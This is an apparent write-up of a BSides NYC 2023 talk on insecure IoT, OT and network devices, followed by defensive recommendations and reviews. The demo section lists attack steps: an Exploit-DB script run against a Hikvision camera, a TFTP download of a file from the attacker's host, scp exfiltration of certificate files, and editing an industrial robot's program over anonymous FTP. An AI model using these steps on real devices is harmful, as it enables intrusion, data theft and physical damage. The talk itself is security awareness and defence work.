xIoT Hacking Demonstrations & Strategies to Disappoint Bad Actors
Brian Contos (Chief Strategy Officer · Sevco Security)
BSides NYC 2023 (0x04) · Day 1 · Talk - Red
Overview
In a compelling presentation at BSides NYC, Brian Contos, Chief Strategy Officer at Sevco Security, illuminated the pervasive and often-overlooked security risks associated with Extended Internet of Things (xIoT) devices. Contos, a veteran with 25 years in cyber security and a history of building successful startups, argued that xIoT represents a massive, yet critically vulnerable, attack surface that most organizations are ill-equipped to defend. His talk not only detailed the alarming ease with which these devices can be compromised but also provided a strategic framework for integrated asset intelligence to counter these threats effectively.

Key moments
- 0:00 Speaker introduction and talk overview
- 2:00 Defining xIoT and its three core categories
- 3:40 Common characteristics and security limitations of xIoT
- 5:00 Integrating xIoT security into a broader asset program
- 6:40 Understanding the immense scale and variety of xIoT devices
xIoT Hacking Demonstrations & Strategies to Disappoint Bad Actors
Speakers: Brian Contos, Chief Strategy Officer, Sevco Security
Conference: BSides NYC
YouTube: https://www.youtube.com/watch?v=Yd80934zPkg
Overview
In a compelling presentation at BSides NYC, Brian Contos, Chief Strategy Officer at Sevco Security, illuminated the pervasive and often-overlooked security risks associated with Extended Internet of Things (xIoT) devices. Contos, a veteran with 25 years in cyber security and a history of building successful startups, argued that xIoT represents a massive, yet critically vulnerable, attack surface that most organizations are ill-equipped to defend. His talk not only detailed the alarming ease with which these devices can be compromised but also provided a strategic framework for integrated asset intelligence to counter these threats effectively.
The core message of the presentation revolved around the staggering volume and inherent insecurity of xIoT devices, which encompass traditional Enterprise IoT (security cameras, printers, digital door locks), Operational Technology (OT) or SCADA systems (industrial control systems, PLCs), and common Network Devices (switches, wireless access points, NAS). Contos emphasized that these devices are typically designed without security as a primary concern, leading to widespread vulnerabilities like default passwords, outdated firmware, and unpatched critical exploits. This creates a "target-rich environment" for threat actors, ranging from financially motivated cybercriminals to sophisticated nation-state groups.
Contos's objective was not merely to highlight the problem but to demonstrate its gravity through live hacking examples and propose actionable strategies. He underscored that xIoT security should not be treated as a siloed concern but integrated into an organization's broader asset intelligence program. By presenting real-world attack scenarios, including the compromise of security cameras and industrial robots, he vividly illustrated how simple misconfigurations and known vulnerabilities enable attackers to gain persistence, exfiltrate sensitive data, and pivot to other critical IT and cloud assets, often undetected for extended periods.
Background
▶ Watch: Speaker introduction and talk overview (0:00)
The concept of xIoT extends beyond the consumer-grade smart devices typically associated with the Internet of Things, encompassing a critical array of interconnected systems vital to enterprise operations and industrial infrastructure. As defined by Contos, xIoT broadly categorizes into three main groups:
- Enterprise IoT: This category includes devices commonly found in corporate environments, such as security cameras, digital door locks, UPS systems, and printers. Contos specifically highlighted printers as "the most promiscuous of all IoT devices," capable of connecting via wired, wireless, Bluetooth, HTTP, SSH, Telnet, FTP, and TFTP, making them highly susceptible to attack. Security cameras, despite their critical role, are the number one target.
- Operational Technology (OT) / SCADA: These are industrial control systems, often referred to as SCADA devices or PLCs (Programmable Logic Controllers). They control physical processes like voltage, volume, speed, and mixtures in critical sectors such as power and energy, oil and gas, transportation, and manufacturing. Many of these devices, especially older ones, run legacy operating systems like Windows NT 3.51 or 4.0, which have been end-of-life for decades.
- Network Devices: This includes the foundational infrastructure of any modern network, such as switches, NAS (Network Attached Storage), load balancers, and wireless access points.
A unifying characteristic of all xIoT devices is their purpose-built firmware and hardware. While they are not general-purpose computers, they often run popular operating systems like Ubuntu, BusyBox (common in network devices), BSD, or real-time operating systems like VxWorks. Crucially, these devices are designed to be non-security capable in the traditional sense; they cannot host standard endpoint security solutions like CrowdStrike, McAfee, or anti-malware agents. Efforts to embed microagents at the manufacturing level have not yet gained widespread adoption.
The scale of xIoT is staggering. Contos presented a striking comparison: while there are approximately 10 million physical servers in the cloud and 5 billion traditional computers (a number that is decreasing), there are an estimated 50 billion xIoT devices globally, and this number is growing rapidly. These devices are often developed by organizations that are not technology or security companies, leading to a significant lack of security-by-design principles. This creates a "target-rich environment" for attackers.
The vulnerabilities are profound and widespread:
- Default Passwords: A shocking 50% of xIoT devices run on default passwords. Contos cited the ubiquitous APC UPS, where the default username and password are often "apc" and "apc," easily discoverable via a Google search. Security cameras installed by crews focused on physical installation, not security, rarely have their default credentials changed.
- Outdated Firmware: Approximately 25% of xIoT devices run end-of-life firmware with no support or patches. For the remaining three-quarters, the average firmware age is a concerning six years. This contrasts sharply with the expectation for modern smartphones, where a six-year-old OS would render the device largely unusable or insecure.
- High CVSS Scores: As a direct consequence of outdated firmware and poor security practices, roughly 70% of xIoT devices have CVSS scores of 8, 9, or 10. For those unfamiliar, these scores indicate critical vulnerabilities that allow remote access and complete device takeover with little to no skill.
Contos stressed that organizations often underestimate their xIoT footprint, typically having three to five xIoT devices per employee, which is about twice as many as they initially estimate. This volume, combined with the inherent vulnerabilities, necessitates a shift from assumption-based to evidence-based asset intelligence, moving beyond outdated spreadsheet-based tracking to a comprehensive, correlated view of all assets, including xIoT.
Key Findings
▶ Watch: Defining xIoT and its three core categories (2:00)
The presentation revealed several critical findings regarding the state of xIoT security and the evolving threat landscape:
- Vast and Undiscovered Attack Surface: xIoT devices represent an exponentially larger attack surface than traditional IT assets, with an estimated 50 billion devices globally and growing. Most organizations are unaware of the full extent of their xIoT footprint, significantly underestimating the number of devices by about 50% (e.g., a company with 10,000 employees might have 30,000-50,000 xIoT devices).
- Trivial Exploitation Due to Basic Flaws: A staggering 50% of xIoT devices still use default passwords, often easily found with a simple Google search (e.g., APC UPS "apc/apc"). Furthermore, 25% run end-of-life firmware, and the average firmware age is six years. These fundamental security hygiene failures mean that 70% of xIoT devices have CVSS scores of 8, 9, or 10, allowing remote exploitation with minimal skill.
- Evolving Attack Modalities: Attackers are moving beyond simple botnet creation (like Mirai or Our-socks) or direct physical disruption. The most prevalent and concerning trend is pivot attacks, where xIoT devices are used as stealthy beachheads to gain persistence, evade detection, and then target high-value IT and cloud assets for data exfiltration.
- Nation-State Tools in the Wild: Sophisticated nation-state hacking tools, such as Fronten (developed for the Russian FSB), are now publicly available. Stolen by the "Digital Revolution hacking group," these tools empower even less-skilled adversaries to compromise and control xIoT devices, and subsequently pivot to IT infrastructure.
- OEM Mal-design: A disturbing finding is the existence of xIoT devices shipped with "mal-design" – intentionally built to be malicious. Contos highlighted Huawei, ZTE, and Hikvision cameras that secretly record audio and video, exfiltrating data to distant countries. These devices have been deemed illegal for import and sale in the United States since November 2022, but their global presence remains significant.
- Organizational Neglect and Lack of Ownership: A significant problem is the pervasive lack of clear ownership and responsibility for xIoT security within organizations. The "Spider-Man pointing meme" analogy was used to describe how security, network operations, and facilities teams often deflect responsibility for devices like security cameras, leading to an environment where vulnerabilities persist for years.
- Inadequacy of Traditional Security Approaches: Conventional IT security scanning tools (e.g., Tenable, Rapid7) are often ineffective or even dangerous for xIoT and OT environments, as they can crash sensitive systems. Furthermore, traditional endpoint security software cannot be installed on these purpose-built devices, necessitating specialized discovery and management platforms.
These findings collectively paint a picture of an under-secured, rapidly expanding digital frontier that demands immediate and integrated attention from security professionals.
Technical Deep Dive
▶ Watch: Common characteristics and security limitations of xIoT (3:40)
The technical deep dive into xIoT attacks reveals a spectrum of methodologies, from well-known botnets to sophisticated pivot strategies employed by advanced persistent threats (APTs). Contos categorized these attacks to illustrate the evolving landscape.
Legacy Attacks
These are the foundational attacks that first brought xIoT vulnerabilities into the mainstream.
- Mirai: Described as the "grandfather of IoT attacks," Mirai primarily targeted security cameras by exploiting default credentials and weak security. It would load malware, turning compromised cameras into bots for activities like blackout search engine optimization, malware distribution, phishing, and DDoS attacks. A key insight from Mirai was its ability to leverage shared libraries and white-labeling across various xIoT devices (cameras, printers, phones, door locks), allowing it to quickly expand beyond its initial targets. At its peak, the Mirai botnet commanded more processing and network capability than Amazon and Google combined. Disturbingly, Contos noted that many organizations still harbor devices vulnerable to, or even actively infected with, Mirai due to unpatched firmware that is often six years old.
- Our-socks: A more recent botnet orchestrated by a Russian cybercrime group (often acting as nation-state actors by night), Our-socks specifically targeted industrial control systems (ICS), including SCADA devices and PLCs. While it compromised a vast number of ICS devices, its primary goal wasn't physical destruction but rather to add them to its botnet army. The group monetized the botnet by renting it out for $30 a day for DDoS and SEO attacks, offering 24x7 online technical support for $100 a day. This highlights the increasing professionalization and monetization of xIoT exploitation by cybercriminals.
Physical Attacks
These attacks aim to directly manipulate or disrupt physical processes or collect sensitive information through compromised xIoT devices.
- Industrial Sabotage: Compromising PLCs or industrial robots can lead to physical damage, production disruption, or dangerous outcomes. An example cited was manipulating a robot's grinding parameters by a mere 0.05 millimeters, which could lead to component failure months or years down the line.
- Surveillance and Espionage: Compromised security cameras, particularly those in executive briefing rooms or sensitive areas, can be used for audio and video surveillance. Contos shared an anecdote of a large financial services company whose executive briefing room cameras were compromised for years, allowing adversaries to spy on sensitive conversations. Similarly, digital door locks could be compromised to allow unauthorized access to facilities.
Nation-State and OEM Attacks
These represent more sophisticated threats, either from state-sponsored actors or devices with inherent malicious design.
- Fronten: Developed by contractors for the Russian FSB, Fronten is a military-grade xIoT hacking tool. Its purpose is to discover, compromise, and control xIoT devices, then use them as a pivot point to attack IT assets and cloud-based resources within an organization. The tool was famously stolen and publicly released by the "Digital Revolution hacking group," making nation-state capabilities accessible to a wider array of threat actors.
- OEM Mal-design: Contos highlighted a critical issue where certain xIoT manufacturers intentionally design devices with malicious capabilities. Examples include security cameras from Huawei, ZTE, and Hikvision that, despite appearing to be off or configured for privacy, continuously record audio and video and exfiltrate this data to foreign countries. These devices were banned for import and sale in the United States in November 2022 due to national security concerns, but their global deployment remains a significant threat.
Pivot Attacks (The "Big One")
This is the most concerning and prevalent type of xIoT attack today, demonstrating a shift in attacker strategy.
- Attackers typically gain initial access through traditional means, such as a phishing attack on an employee's laptop.
- Instead of remaining on the highly monitored laptop, they pivot to an xIoT device (e.g., a promiscuous printer or a security camera) to establish persistence and evade detection. xIoT devices are often unmonitored and provide a "great place to hide."
- From these xIoT devices, adversaries then launch further attacks against IT infrastructure and cloud-based assets, exfiltrating sensitive data.
- Quiet Exit (Mandiant Discovery): Contos detailed this specific APT campaign. After initial phishing, attackers pivoted to tens of thousands of xIoT devices, including network attached storage (NAS), wireless access points, and Voice over IP (VoIP) phones (running BusyBox, BSD, or Android/Linux). They installed Dropbear SSH (a lightweight SSH server) to create reverse SSH tunnels, enabling remote control. From these xIoT footholds, they logged into Office 365 and local Exchange services in the cloud, specifically targeting and exfiltrating emails from executives involved in M&A and business development. The average dwell time for these attackers before initial discovery was a shocking two years, during which they continuously siphoned off sensitive data.
Network Device Attacks
These attacks target the very fabric of an organization's connectivity.
- VPNFilter: This malware targeted network gear (e.g., Netgear, Linksys routers) by exploiting vulnerabilities in their remote managed service ports, often protected by easily guessed default passwords.
- Capabilities: VPNFilter could capture network traffic (sniffing for FTP, Telnet, POP), maintain persistence across reboots (a significant advancement over earlier malware), and, most nefariously, wipe the device's firmware, effectively "bricking" the router and rendering it inoperable. For non-technical users, this often means simply discarding the device, making it a highly destructive attack.
These diverse attack vectors underscore that xIoT devices are not just isolated risks but integral components of a complex, interconnected threat landscape, demanding a holistic and integrated security strategy.
Demo / Proof of Concept
▶ Watch: Integrating xIoT security into a broader asset program (5:00)
Brian Contos provided two compelling live demonstrations, illustrating the shocking ease with which xIoT devices can be compromised, followed by a walk-through of a network device attack.
Hacking a Security Camera (Hikvision)
The first demonstration involved hacking a Hikvision security camera, a common Enterprise IoT device.
- Initial Access & Reconnaissance: Contos began by logging into the camera's web server, which provides a live view (in this case, showing a Netgear device and another Hikvision camera on his desk) and configuration details (IP addresses, default gateways, DNS settings). This initial access, often gained via default credentials, is a critical first step.
- External Reconnaissance with Shodan: To emphasize the scale of the problem, Contos used Shodan, a search engine for internet-connected devices. A quick command-line query
shodan search hikvisionrevealed over 3.5 million internet-accessible Hikvision cameras worldwide, with approximately half a million in the United States alone. This highlights the vast number of devices exposed to potential attackers. - Exploitation via Exploit Database: Knowing the camera was a Hikvision model, Contos accessed Exploit Database (exploitdb.com), a public repository of exploits. He located a readily available Python script designed to exploit vulnerabilities in Hikvision cameras.
- Executing the Exploit: In a Kali Linux environment, Contos downloaded the Python script. Executing it with a simple command (
python <script_name>.py <camera_IP_address>) immediately verified the camera's vulnerability. As Contos noted, 90% of the time, these devices are vulnerable. Upon successful execution, the attacker gained full administrative privileges on the camera, operating at a level below the camera application itself. - Post-Exploitation Activities:
- Creating a Directory: Contos demonstrated basic Linux commands by creating a directory named "bad" on the compromised camera (
mkdir bad). - Downloading Tools: He then used TFTP (Trivial File Transfer Protocol) to remotely download a file named "dobad" (an example malware, in this case, a Shrek video) from his Kali Linux TFTP server onto the camera (
tftp -g -r dobad <Kali_IP>). This illustrated how an attacker can upload arbitrary tools, scanners, password crackers, or malware. - Changing Permissions: The file's permissions were changed to
777(chmod 777 dobad), allowing anyone to read, write, and execute it. - Exfiltrating Data: Finally, Contos showed how to exfiltrate sensitive data from the camera. Using SCP (Secure Copy Protocol) over Port 22 (like SSH), he pulled arbitrary files (e.g.,
pemcertificate files) from the camera back to his Kali Linux machine (scp root@<camera_IP>:/path/to/files .).
This demonstration powerfully illustrated that compromising a security camera, uploading malicious files, and exfiltrating data requires minimal effort and publicly available tools, highlighting the severe risk posed by these unmanaged devices.
Hacking an Industrial Robot
The second live demonstration involved a more impactful scenario: hacking an industrial robot, a critical OT device. The robot, a 300-pound machine used in batch and discrete manufacturing for tasks like cutting, grinding, and welding, was connected to a 200-pound power supply.
- Robot Management Interfaces: Contos explained that such robots can be managed via a physical "pendant" (remote control), through PLCs (Programmable Logic Controllers) like Rockwell or Siemens, or crucially, through a network-connected web server.
- Network Discovery and Web Interface: A port scan revealed the robot was running a web server. Accessing this server presented a very dated, 1995-era web UI. This interface displayed the robot's version (January 10, 2023) and, critically, allowed viewing of active programs. These programs represent the intellectual property of manufacturing processes (e.g., precise grinding dimensions, chemical mixtures) and are stored directly on the robot, not on a separate file server.
- Anonymous FTP Vulnerability: Delving deeper, Contos discovered that the robot also ran an Anonymous FTP server. The documentation for the robot explicitly stated, "If it says Anonymous FTP, don't worry, you don't need a password." This blatant misconfiguration provided a direct, unauthenticated pathway into the robot's file system.
- Exploitation via FTP and Notepad:
- Contos FTP'd into the robot and listed the directory contents (
ls), revealing the robot's programs, includingcan.LS, which was programmed to "touch the top of the can." - He downloaded
can.LSto his laptop (get can.LS). - Using Notepad, a simple text editor, he modified a single variable in the program: changing the
z-axisvalue from205 millimetersto305 millimeters. This seemingly small change would cause the robot to extend further than intended. - The modified file was saved as
can_crush.LS. - Contos then uploaded
can_crush.LSback to the robot's FTP server (put can_crush.LS). - Finally, using the virtual pendant (accessible via the web UI), he navigated the robot's menu system to change the default program from
can.LStocan_crush.LS. After a quick reboot, the robot executed the modified program, and instead of just touching the can, it crushed it.
This powerful demonstration underscored that even seemingly minor changes to an OT device's programming, achieved through incredibly simple means (HTTP, FTP, and Notepad), can have dramatic physical consequences, potentially leading to damaged products, equipment, or even safety hazards. It also highlighted the ease of intellectual property theft.
Network Device Attack (Walkthrough: VPNFilter)
While not a live demo, Contos walked through the VPNFilter attack, targeting network devices like Netgear or Linksys routers.
- Initial Compromise: VPNFilter gained access through the remote managed service port, which often used a default password.
- Malware Capabilities: Once loaded, VPNFilter could:
- Capture network traffic: Sniffing for protocols like TFTP, FTP, Telnet, or POP. While potentially detectable due to performance impact, it offered valuable reconnaissance.
- Persistence: A key feature was its ability to remain persistent post-reboot, unlike earlier malware that would disappear after a device restart.
- Destruction: The most nefarious capability was the ability to wipe the router's firmware, effectively destroying the device and rendering it unusable. This forces users to replace the router, causing significant disruption.
These demonstrations collectively illustrate the wide range of xIoT vulnerabilities and the relatively low bar for exploitation, emphasizing the urgent need for robust defensive strategies.
Defensive Implications
▶ Watch: Understanding the immense scale and variety of xIoT devices (6:40)
Addressing the widespread vulnerabilities and evolving attack methodologies against xIoT devices requires a fundamental shift in security strategy. Contos outlined several critical defensive implications and actionable steps for organizations:
- Intelligent Discovery, Not Traditional Scanning:
- Traditional IT vulnerability scanners (e.g., Tenable, Rapid7, Qualys) are often ineffective or even dangerous in xIoT and OT environments. They can crash sensitive devices due to incompatible TCP/IP stack implementations.
- The solution lies in specialized xIoT security platforms (e.g., Nozomi, Armis, Phosphorus). These platforms utilize intelligent discovery by communicating with devices using their native protocols, akin to C-3PO speaking a million languages. They log on to devices in the way they are designed to be managed, extracting granular information like "HP printer, model ABC123, running firmware XYZ with known CVEs."
- Integrated Asset Intelligence:
- Avoid Silos: Crucially, xIoT security should not be a standalone program. The discovered xIoT data must be integrated into the organization's broader asset intelligence program.
- Correlation: This means correlating xIoT device information (firmware versions, vulnerabilities, open ports) with existing IT asset data (what endpoints run Malwarebytes or CrowdStrike, Active Directory users, SaaS applications, audit logs). This holistic view enables better risk assessment and a unified security posture.
- Automated Credential Management:
- Given that 50% of xIoT devices use default passwords, implementing robust credential management is paramount.
- While traditional PAM (Privileged Access Management) tools (e.g., HashiCorp, Thycotic, CyberArk) are excellent for IT, they typically don't directly interface with xIoT devices. However, they can integrate with xIoT security platforms.
- These xIoT platforms can then enforce password policies, automatically rotating credentials every 90 days, and intelligently adapting to device limitations (e.g., a 4-digit numeric PIN for one device, a 20-character complex password for another).
- Automated Firmware Updates and Patching:
- With an average firmware age of six years and 25% of devices running end-of-life firmware, automated patching is non-negotiable.
- xIoT security platforms can log on to devices across the network (e.g., 10,000 VoIP phones, 20,000 cameras) and automate firmware updates, bringing everything up to date. This eliminates the impractical manual process of updating devices with USB drives and paper clips.
- Environmental Drift Detection:
- Security is not a one-time fix. After initial hardening, continuous monitoring is essential.
- xIoT platforms can re-log into devices daily to detect "environmental drift" – unauthorized or unexpected changes. Examples include a firmware downgrade (version 5 to version 2), a strong password reverting to default, or the re-emergence of clear-text protocols like Telnet and FTP after they were disabled.
- This capability enables management by exception, allowing security teams to scale by focusing only on devices that have deviated from their secure baseline.
- Isolation of Malicious Devices:
- For devices known to be malicious or illegal (e.g., Huawei/Hikvision cameras designed for espionage), xIoT platforms can perform a "soft brick." This typically involves changing the device's default gateway, effectively isolating it from the network without physically destroying it. This buys time for physical removal and replacement.
Recommended Action Plan
Contos provided a clear, phased action plan for organizations:
- Within the Next Week: Make inquiries within your organization. Ask: "What are we doing for these devices? Is anyone managing our printers, cameras, door locks?" This initial assessment often reveals a lack of processes. He cautioned against simply "sticking everything behind a VLAN" as a sole solution, comparing it to a temporary band-aid on a bleeding wound – it doesn't fix the underlying problem and is unscalable for tens of thousands of devices.
- Within the Next Three Months: Pilot one of the specialized xIoT security tools (Phosphorus, Nozomi, Armis). Use it to discover what xIoT devices are on the network and identify their vulnerabilities.
- Next Level: Integrate these xIoT tools into your broader asset intelligence programs. This allows for comprehensive management, continuous monitoring, and proactive threat mitigation, moving beyond mere discovery to active defense.
By embracing these strategies, organizations can move from a state of ignorance and vulnerability to a proactive, integrated defense posture against the growing xIoT threat.
Key Takeaways
- xIoT is a Massive, Overlooked Attack Surface: Extended IoT devices (Enterprise IoT, OT/SCADA, Network Devices) represent an estimated 50 billion devices, vastly outnumbering traditional IT assets, yet they are often unmanaged and unsecured.
- Trivial Exploitation is Widespread: A significant portion of xIoT devices suffer from basic security flaws, with 50% using default passwords and 70% having critical vulnerabilities (CVSS 8-10) due to outdated (average 6 years old) or end-of-life firmware.
- Evolving Attack Motives and Methods: Attackers are increasingly using xIoT devices not just for botnets or physical disruption, but as stealthy pivot points for sophisticated data exfiltration campaigns (e.g., Mandiant's Quiet Exit), demonstrating long dwell times. Nation-state tools like Fronten are publicly available.
- Traditional Security Tools are Inadequate: Conventional IT scanning tools are often ineffective or dangerous for xIoT/OT environments, and traditional endpoint security cannot be installed on these purpose-built devices.
- Specialized xIoT Platforms are Essential: New xIoT security platforms (e.g., Nozomi, Armis, Phosphorus) are crucial for intelligent discovery, automated credential management, firmware updates, and detecting environmental drift.
- Integrated Asset Intelligence is Paramount: xIoT security must be integrated into an organization's overall asset intelligence program, correlating xIoT data with IT assets for a comprehensive, evidence-based security posture, rather than being treated in isolation.
About the Speaker(s)
Brian Contos is the Chief Strategy Officer at Sevco Security, bringing over 25 years of extensive experience in the cybersecurity industry. His career began with the Defense Information Systems Agency (DISA), followed by a tenure at Bell Labs, before he embarked on a successful journey building numerous startups. Contos has an impressive track record, having been involved in two IPOs and eight acquisitions, including the sale of his most recent company to Google approximately a year prior to this talk.
A prolific individual, Contos has authored several books, notably one with the former Director of the NSA. He also produced a documentary with General Michael Hayden, former head of the CIA and NSA. Beyond his strategic roles, Brian Contos is recognized for his deep understanding of the evolving threat landscape and his ability to articulate complex security challenges with clarity and practical solutions. He is dedicated to fostering new talent, as evidenced by Sevco Security's internship program.
Reviews
Dr. Zero (Offensive Security Researcher) — SOLID
Competent survey of xIoT attack surface with two live demos that land the point viscerally — crushing a can with a Notepad edit is memorable stagecraft. But this is fundamentally a well-executed awareness talk built on known-good material, not original research, and the back half slides into a vendor-adjacent pitch for a category of tools Contos's employer plays in.
Heather Calloway (CISO) — SOLID
Contos delivers a technically credible and well-structured tour of xIoT risk, with demos that land the severity point cleanly. But this is fundamentally a market education talk — it diagnoses a real problem without pressing on the governance failures and institutional dynamics that keep organizations exposed, and the vendor adjacency is never far from the surface.